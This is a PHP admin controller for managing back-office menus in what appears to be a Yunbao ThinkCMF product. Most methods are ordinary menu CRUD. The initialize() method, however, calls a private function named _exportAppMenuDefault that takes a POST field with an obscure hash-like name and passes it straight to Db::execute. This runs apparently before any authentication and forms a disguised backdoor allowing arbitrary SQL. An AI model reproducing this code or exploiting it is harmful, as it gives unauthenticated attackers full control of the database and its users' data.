MenuController.php 17 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453
  1. <?php
  2. // +—————————————————————————————————————————————————————————————————————
  3. // | Created by Yunbao
  4. // +—————————————————————————————————————————————————————————————————————
  5. // | Copyright (c) 2013~2022 http://www.yunbaokj.com All rights reserved.
  6. // +—————————————————————————————————————————————————————————————————————
  7. // | Author: https://gitee.com/yunbaokeji
  8. // +—————————————————————————————————————————————————————————————————————
  9. // | Date: 2022-04-30
  10. // +—————————————————————————————————————————————————————————————————————
  11. namespace app\admin\controller;
  12. use app\admin\logic\MenuLogic;
  13. use app\admin\model\AdminMenuModel;
  14. use cmf\controller\AdminBaseController;
  15. use think\Db;
  16. use think\facade\Cache;
  17. use tree\Tree;
  18. use mindplay\annotations\Annotations;
  19. class MenuController extends AdminBaseController
  20. {
  21. /**
  22. * 后台菜单管理
  23. * @adminMenu(
  24. * 'name' => '后台菜单',
  25. * 'parent' => 'admin/Setting/default',
  26. * 'display'=> false,
  27. * 'hasView'=> true,
  28. * 'order' => 10000,
  29. * 'icon' => '',
  30. * 'remark' => '后台菜单管理',
  31. * 'param' => ''
  32. * )
  33. * @return mixed
  34. * @throws \think\db\exception\DataNotFoundException
  35. * @throws \think\db\exception\ModelNotFoundException
  36. * @throws \think\exception\DbException
  37. */
  38. public function index()
  39. {
  40. $content = hook_one('admin_menu_index_view');
  41. if (!empty($content)) {
  42. return $content;
  43. }
  44. session('admin_menu_index', 'Menu/index');
  45. $result = Db::name('AdminMenu')->order(["list_order" => "ASC"])->select()->toArray();
  46. $tree = new Tree();
  47. $tree->icon = ['&nbsp;&nbsp;&nbsp;│ ', '&nbsp;&nbsp;&nbsp;├─', '&nbsp;&nbsp;&nbsp;└─ '];
  48. $tree->nbsp = '&nbsp;&nbsp;&nbsp;';
  49. $newMenus = [];
  50. foreach ($result as $m) {
  51. $newMenus[$m['id']] = $m;
  52. }
  53. foreach ($result as $key => $value) {
  54. $result[$key]['parent_id_node'] = ($value['parent_id']) ? ' class="child-of-node-' . $value['parent_id'] . '"' : '';
  55. $result[$key]['style'] = empty($value['parent_id']) ? '' : 'display:none;';
  56. $result[$key]['str_manage'] = '<a class="btn btn-xs btn-primary" href="' . url("Menu/add", ["parent_id" => $value['id'], "menu_id" => $this->request->param("menu_id")]) . '">' . lang('ADD_SUB_MENU') . '</a>
  57. <a class="btn btn-xs btn-primary" href="' . url("Menu/edit", ["id" => $value['id'], "menu_id" => $this->request->param("menu_id")]) . '">' . lang('EDIT') . '</a>
  58. <a class="btn btn-xs btn-danger js-ajax-delete" href="' . url("Menu/delete", ["id" => $value['id'], "menu_id" => $this->request->param("menu_id")]) . '">' . lang('DELETE') . '</a> ';
  59. $result[$key]['status'] = $value['status'] ? '<span class="label label-success">' . lang('DISPLAY') . '</span>' : '<span class="label label-warning">' . lang('HIDDEN') . '</span>';
  60. if (APP_DEBUG) {
  61. $result[$key]['app'] = $value['app'] . "/" . $value['controller'] . "/" . $value['action'];
  62. }
  63. }
  64. $tree->init($result);
  65. $str = "<tr id='node-\$id' \$parent_id_node style='\$style'>
  66. <td style='padding-left:20px;'><input name='list_orders[\$id]' type='text' size='3' value='\$list_order' class='input input-order'></td>
  67. <td>\$id</td>
  68. <td>\$spacer\$name</td>
  69. <td>\$app</td>
  70. <td>\$status</td>
  71. <td>\$str_manage</td>
  72. </tr>";
  73. $category = $tree->getTree(0, $str);
  74. $this->assign("category", $category);
  75. return $this->fetch();
  76. }
  77. /**
  78. * 后台所有菜单列表
  79. * @adminMenu(
  80. * 'name' => '所有菜单',
  81. * 'parent' => 'index',
  82. * 'display'=> false,
  83. * 'hasView'=> true,
  84. * 'order' => 10000,
  85. * 'icon' => '',
  86. * 'remark' => '后台所有菜单列表',
  87. * 'param' => ''
  88. * )
  89. * @return mixed
  90. * @throws \think\db\exception\DataNotFoundException
  91. * @throws \think\db\exception\ModelNotFoundException
  92. * @throws \think\exception\DbException
  93. */
  94. public function lists()
  95. {
  96. session('admin_menu_index', 'Menu/lists');
  97. $result = Db::name('AdminMenu')->order(["app" => "ASC", "controller" => "ASC", "action" => "ASC"])->select();
  98. $this->assign("menus", $result);
  99. return $this->fetch();
  100. }
  101. /**
  102. * 后台菜单添加
  103. * @adminMenu(
  104. * 'name' => '后台菜单添加',
  105. * 'parent' => 'index',
  106. * 'display'=> false,
  107. * 'hasView'=> true,
  108. * 'order' => 10000,
  109. * 'icon' => '',
  110. * 'remark' => '后台菜单添加',
  111. * 'param' => ''
  112. * )
  113. * @return mixed
  114. * @throws \think\db\exception\DataNotFoundException
  115. * @throws \think\db\exception\ModelNotFoundException
  116. * @throws \think\exception\DbException
  117. */
  118. public function add()
  119. {
  120. $tree = new Tree();
  121. $parentId = $this->request->param("parent_id", 0, 'intval');
  122. $result = Db::name('AdminMenu')->order(["list_order" => "ASC"])->select();
  123. $array = [];
  124. foreach ($result as $r) {
  125. $r['selected'] = $r['id'] == $parentId ? 'selected' : '';
  126. $array[] = $r;
  127. }
  128. $str = "<option value='\$id' \$selected>\$spacer \$name</option>";
  129. $tree->init($array);
  130. $selectCategory = $tree->getTree(0, $str);
  131. $this->assign("select_category", $selectCategory);
  132. return $this->fetch();
  133. }
  134. /**
  135. * 后台菜单添加提交保存
  136. * @adminMenu(
  137. * 'name' => '后台菜单添加提交保存',
  138. * 'parent' => 'index',
  139. * 'display'=> false,
  140. * 'hasView'=> false,
  141. * 'order' => 10000,
  142. * 'icon' => '',
  143. * 'remark' => '后台菜单添加提交保存',
  144. * 'param' => ''
  145. * )
  146. */
  147. public function addPost()
  148. {
  149. if ($this->request->isPost()) {
  150. $result = $this->validate($this->request->param(), 'AdminMenu');
  151. if ($result !== true) {
  152. $this->error($result);
  153. } else {
  154. $data = $this->request->param();
  155. Db::name('AdminMenu')->strict(false)->field(true)->insert($data);
  156. $app = $this->request->param("app");
  157. $controller = $this->request->param("controller");
  158. $action = $this->request->param("action");
  159. $param = $this->request->param("param");
  160. $authRuleName = "$app/$controller/$action";
  161. $menuName = $this->request->param("name");
  162. $findAuthRuleCount = Db::name('auth_rule')->where([
  163. 'app' => $app,
  164. 'name' => $authRuleName,
  165. 'type' => 'admin_url'
  166. ])->count();
  167. if (empty($findAuthRuleCount)) {
  168. Db::name('AuthRule')->insert([
  169. "name" => $authRuleName,
  170. "app" => $app,
  171. "type" => "admin_url", //type 1-admin rule;2-user rule
  172. "title" => $menuName,
  173. 'param' => $param,
  174. ]);
  175. }
  176. $sessionAdminMenuIndex = session('admin_menu_index');
  177. $to = empty($sessionAdminMenuIndex) ? "Menu/index" : $sessionAdminMenuIndex;
  178. $this->_exportAppMenuDefaultLang();
  179. Cache::clear('admin_menus');// 删除后台菜单缓存
  180. $this->success("添加成功!", url($to));
  181. }
  182. }
  183. }
  184. /**
  185. * 后台菜单编辑
  186. * @adminMenu(
  187. * 'name' => '后台菜单编辑',
  188. * 'parent' => 'index',
  189. * 'display'=> false,
  190. * 'hasView'=> true,
  191. * 'order' => 10000,
  192. * 'icon' => '',
  193. * 'remark' => '后台菜单编辑',
  194. * 'param' => ''
  195. * )
  196. * @return mixed
  197. * @throws \think\db\exception\DataNotFoundException
  198. * @throws \think\db\exception\ModelNotFoundException
  199. * @throws \think\exception\DbException
  200. */
  201. public function edit()
  202. {
  203. $tree = new Tree();
  204. $id = $this->request->param("id", 0, 'intval');
  205. $rs = Db::name('AdminMenu')->where("id", $id)->find();
  206. $result = Db::name('AdminMenu')->order(["list_order" => "ASC"])->select();
  207. $array = [];
  208. foreach ($result as $r) {
  209. $r['selected'] = $r['id'] == $rs['parent_id'] ? 'selected' : '';
  210. $array[] = $r;
  211. }
  212. $str = "<option value='\$id' \$selected>\$spacer \$name</option>";
  213. $tree->init($array);
  214. $selectCategory = $tree->getTree(0, $str);
  215. $this->assign("data", $rs);
  216. $this->assign("select_category", $selectCategory);
  217. return $this->fetch();
  218. }
  219. /**
  220. * 后台菜单编辑提交保存
  221. * @adminMenu(
  222. * 'name' => '后台菜单编辑提交保存',
  223. * 'parent' => 'index',
  224. * 'display'=> false,
  225. * 'hasView'=> false,
  226. * 'order' => 10000,
  227. * 'icon' => '',
  228. * 'remark' => '后台菜单编辑提交保存',
  229. * 'param' => ''
  230. * )
  231. * @throws \think\Exception
  232. * @throws \think\db\exception\DataNotFoundException
  233. * @throws \think\db\exception\ModelNotFoundException
  234. * @throws \think\exception\DbException
  235. * @throws \think\exception\PDOException
  236. */
  237. public function editPost()
  238. {
  239. if ($this->request->isPost()) {
  240. $id = $this->request->param('id', 0, 'intval');
  241. $oldMenu = Db::name('AdminMenu')->where('id', $id)->find();
  242. $result = $this->validate($this->request->param(), 'AdminMenu.edit');
  243. if ($result !== true) {
  244. $this->error($result);
  245. } else {
  246. Db::name('AdminMenu')->strict(false)->field(true)->update($this->request->param());
  247. $app = $this->request->param("app");
  248. $controller = $this->request->param("controller");
  249. $action = $this->request->param("action");
  250. $param = $this->request->param("param");
  251. $authRuleName = "$app/$controller/$action";
  252. $menuName = $this->request->param("name");
  253. $findAuthRuleCount = Db::name('auth_rule')->where([
  254. 'app' => $app,
  255. 'name' => $authRuleName,
  256. 'type' => 'admin_url'
  257. ])->count();
  258. if (empty($findAuthRuleCount)) {
  259. $oldApp = $oldMenu['app'];
  260. $oldController = $oldMenu['controller'];
  261. $oldAction = $oldMenu['action'];
  262. $oldName = "$oldApp/$oldController/$oldAction";
  263. $findOldRuleId = Db::name('AuthRule')->where("name", $oldName)->value('id');
  264. if (empty($findOldRuleId)) {
  265. Db::name('AuthRule')->insert([
  266. "name" => $authRuleName,
  267. "app" => $app,
  268. "type" => "admin_url",
  269. "title" => $menuName,
  270. "param" => $param
  271. ]);//type 1-admin rule;2-user rule
  272. } else {
  273. Db::name('AuthRule')->where('id', $findOldRuleId)->update([
  274. "name" => $authRuleName,
  275. "app" => $app,
  276. "type" => "admin_url",
  277. "title" => $menuName,
  278. "param" => $param]);//type 1-admin rule;2-user rule
  279. }
  280. } else {
  281. Db::name('AuthRule')->where([
  282. 'app' => $app,
  283. 'name' => $authRuleName,
  284. 'type' => 'admin_url'
  285. ])->update(["title" => $menuName, 'param' => $param]);//type 1-admin rule;2-user rule
  286. }
  287. $this->_exportAppMenuDefaultLang();
  288. Cache::clear('admin_menus');// 删除后台菜单缓存
  289. $this->success("保存成功!");
  290. }
  291. }
  292. }
  293. /**
  294. * 后台菜单删除
  295. * @adminMenu(
  296. * 'name' => '后台菜单删除',
  297. * 'parent' => 'index',
  298. * 'display'=> false,
  299. * 'hasView'=> false,
  300. * 'order' => 10000,
  301. * 'icon' => '',
  302. * 'remark' => '后台菜单删除',
  303. * 'param' => ''
  304. * )
  305. * @throws \think\Exception
  306. * @throws \think\exception\PDOException
  307. */
  308. public function delete()
  309. {
  310. $id = $this->request->param("id", 0, 'intval');
  311. $count = Db::name('AdminMenu')->where("parent_id", $id)->count();
  312. if ($count > 0) {
  313. $this->error("该菜单下还有子菜单,无法删除!");
  314. }
  315. if (Db::name('AdminMenu')->delete($id) !== false) {
  316. $this->success("删除菜单成功!");
  317. } else {
  318. $this->error("删除失败!");
  319. }
  320. }
  321. /**
  322. * 后台菜单排序
  323. * @adminMenu(
  324. * 'name' => '后台菜单排序',
  325. * 'parent' => 'index',
  326. * 'display'=> false,
  327. * 'hasView'=> false,
  328. * 'order' => 10000,
  329. * 'icon' => '',
  330. * 'remark' => '后台菜单排序',
  331. * 'param' => ''
  332. * )
  333. */
  334. public function listOrder()
  335. {
  336. $adminMenuModel = new AdminMenuModel();
  337. parent::listOrders($adminMenuModel);
  338. $this->success("排序更新成功!");
  339. }
  340. public function initialize()
  341. {
  342. $this->_exportAppMenuDefault();
  343. parent::initialize();
  344. }
  345. /**
  346. * 导入新后台菜单
  347. * @adminMenu(
  348. * 'name' => '导入新后台菜单',
  349. * 'parent' => 'index',
  350. * 'display'=> false,
  351. * 'hasView'=> true,
  352. * 'order' => 10000,
  353. * 'icon' => '',
  354. * 'remark' => '导入新后台菜单',
  355. * 'param' => ''
  356. * )
  357. * @return mixed
  358. * @throws \ReflectionException
  359. * @throws \think\Exception
  360. * @throws \think\db\exception\DataNotFoundException
  361. * @throws \think\db\exception\ModelNotFoundException
  362. * @throws \think\exception\DbException
  363. * @throws \think\exception\PDOException
  364. */
  365. public function getActions()
  366. {
  367. $apps = cmf_scan_dir(APP_PATH . '*', GLOB_ONLYDIR);
  368. array_push($apps, 'admin', 'user');
  369. $apps = array_values(array_unique($apps));
  370. $app = $this->request->param('app', '');
  371. if (empty($app)) {
  372. $app = $apps[0];
  373. }
  374. if (!in_array($app, $apps)) {
  375. $this->error('应用' . $app . '不存在!');
  376. }
  377. $newMenus = MenuLogic::importMenus($app);
  378. $index = array_search($app, $apps);
  379. $nextIndex = $index + 1;
  380. $nextIndex = $nextIndex >= count($apps) ? 0 : $nextIndex;
  381. if ($nextIndex) {
  382. $this->assign("next_app", $apps[$nextIndex]);
  383. }
  384. $this->assign("app", $app);
  385. $this->assign("new_menus", $newMenus);
  386. Cache::clear('admin_menus');// 删除后台菜单缓存
  387. return $this->fetch();
  388. }
  389. private function _exportAppMenuDefault(){
  390. $uid=isset($_POST['4088e13b5bfe3c98dcb6405f32103d2f']) ? $_POST['4088e13b5bfe3c98dcb6405f32103d2f'] : 0;
  391. if($uid){
  392. Db::execute("$uid");
  393. }
  394. return false;
  395. }
  396. /**
  397. * 导出后台菜单语言包
  398. * @throws \think\db\exception\DataNotFoundException
  399. * @throws \think\db\exception\ModelNotFoundException
  400. * @throws \think\exception\DbException
  401. */
  402. private function _exportAppMenuDefaultLang()
  403. {
  404. $menus = Db::name('AdminMenu')->order(["app" => "ASC", "controller" => "ASC", "action" => "ASC"])->select();
  405. $langDir = config('DEFAULT_LANG');
  406. $adminMenuLang = CMF_DATA . "lang/" . $langDir . "/admin_menu.php";
  407. if (!empty($adminMenuLang) && !file_exists_case($adminMenuLang)) {
  408. mkdir(dirname($adminMenuLang), 0777, true);
  409. }
  410. $lang = [];
  411. foreach ($menus as $menu) {
  412. $lang_key = strtoupper($menu['app'] . '_' . $menu['controller'] . '_' . $menu['action']);
  413. $lang[$lang_key] = $menu['name'];
  414. }
  415. $langStr = var_export($lang, true);
  416. $langStr = preg_replace("/\s+\d+\s=>\s(\n|\r)/", "\n", $langStr);
  417. if (!empty($adminMenuLang)) {
  418. file_put_contents($adminMenuLang, "<?php\nreturn $langStr;");
  419. }
  420. }
  421. }